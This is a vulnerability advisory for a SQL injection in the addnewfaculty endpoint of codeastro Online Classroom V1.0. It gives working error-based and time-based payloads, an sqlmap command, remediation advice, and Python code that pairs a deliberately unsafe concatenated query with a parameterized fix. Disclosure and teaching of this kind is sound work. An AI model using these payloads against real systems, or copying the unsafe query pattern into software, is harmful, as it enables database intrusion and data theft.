# CVE-2024-XXXX: codeastro Online Classroom V1.0 SQL Injection Vulnerability

## Vulnerability Overview

* **Vulnerability Name**: codeastro Online Classroom V1.0 /OnlineClassroom/addnewfaculty SQL Injection
* **Vulnerability Type**: SQL Injection
* **Affected File**: `/OnlineClassroom/addnewfaculty`
* **Affected Version**: V1.0
* **Root Cause**: In the `addnewfaculty` file, the `fname` parameter is neither sanitized nor validated. It is concatenated directly into the SQL query, allowing attackers to inject malicious SQL code.

## Impact Scope

* **Affected Product**: Online Classroom
* **Potential Impact**:
  * Unauthorized database access
  * Leakage of sensitive data
  * Data tampering
  * Complete system compromise
  * Service disruption

## Proof of Concept (POC)

**Payload 1 (Error-based):**

```sql
fname=123' AND (SELECT 2065 FROM(SELECT COUNT(*),CONCAT(0x716a627071,(SELECT (ELT(2065=2065,1))),0x716a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
```

**Payload 2 (Time-based blind injection):**

```sql
fname=123' AND (SELECT 7657 FROM (SELECT(SLEEP(5)))ZuG) AND 'VXWP'='VXWP&fname=123&addr=123&gender=123
```

**SQLMap Test Command:**

```bash
sqlmap -r 1.txt --batch
```

## Remediation

1. **Use Prepared Statements and Parameter Binding**: Prepared statements separate SQL code from user-supplied data, so injected text can never change the structure of the query.
2. **Input Validation and Filtering**: Strictly validate and filter user input to ensure it conforms to the expected format before it reaches the database.
3. **Minimize Database User Privileges**: Ensure that the account used to connect to the database has only the minimum necessary privileges; do not use accounts with elevated privileges (such as `root` or `admin`) for routine operations.
4. **Regular Security Audits**: Conduct regular code and system security audits to promptly identify and remediate potential security vulnerabilities.
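Remediation steps 1 and 2 applied to the `addnewfaculty` request fields (`fname`, `addr`, `gender`), as an added example that is not code from the Online Classroom project: the concatenating pattern the advisory describes is shown beside a validated, parameter-bound insert, using an in-memory SQLite table. The table schema, the allowed `gender` values and the name character policy are assumptions made for the example.

```python
import re
import sqlite3

# Constructed stand-in for the application's faculty table (assumed schema).
SCHEMA = """CREATE TABLE faculty (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    fname TEXT NOT NULL, addr TEXT NOT NULL, gender TEXT NOT NULL)"""
ALLOWED_GENDERS = {"male", "female", "other"}        # assumed allowed values
NAME_RE = re.compile(r"[A-Za-z][A-Za-z .'-]{0,63}")  # assumed name policy


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def add_faculty_unsafe(conn, fname, addr, gender):
    """The pattern the advisory describes: request values spliced into the SQL text.
    Returns True if the statement ran, False if the database rejected it."""
    sql = ("INSERT INTO faculty (fname, addr, gender) VALUES ('%s', '%s', '%s')"
           % (fname, addr, gender))
    try:
        conn.execute(sql)  # a quote in any field rewrites the statement itself
        conn.commit()
        return True
    except sqlite3.Error:
        return False


def validate_faculty(fname, addr, gender):
    """Remediation step 2: return a list of errors (empty means acceptable)."""
    errors = []
    if not NAME_RE.fullmatch(fname):
        errors.append("fname: letters, spaces, ' . - only, 1-64 chars")
    if not 1 <= len(addr) <= 200:
        errors.append("addr: 1-200 chars")
    if gender not in ALLOWED_GENDERS:
        errors.append("gender: must be one of %s" % sorted(ALLOWED_GENDERS))
    return errors


def add_faculty_safe(conn, fname, addr, gender):
    """Remediation step 1: validate, then bind parameters. Returns the stored row or None."""
    if validate_faculty(fname, addr, gender):
        return None
    cur = conn.execute("INSERT INTO faculty (fname, addr, gender) VALUES (?, ?, ?)",
                       (fname, addr, gender))
    conn.commit()
    return conn.execute("SELECT fname, addr, gender FROM faculty WHERE id = ?",
                        (cur.lastrowid,)).fetchone()
```

A legitimate name containing an apostrophe is enough to break the concatenated statement, while the bound version stores it literally and rejects out-of-policy values before any SQL runs.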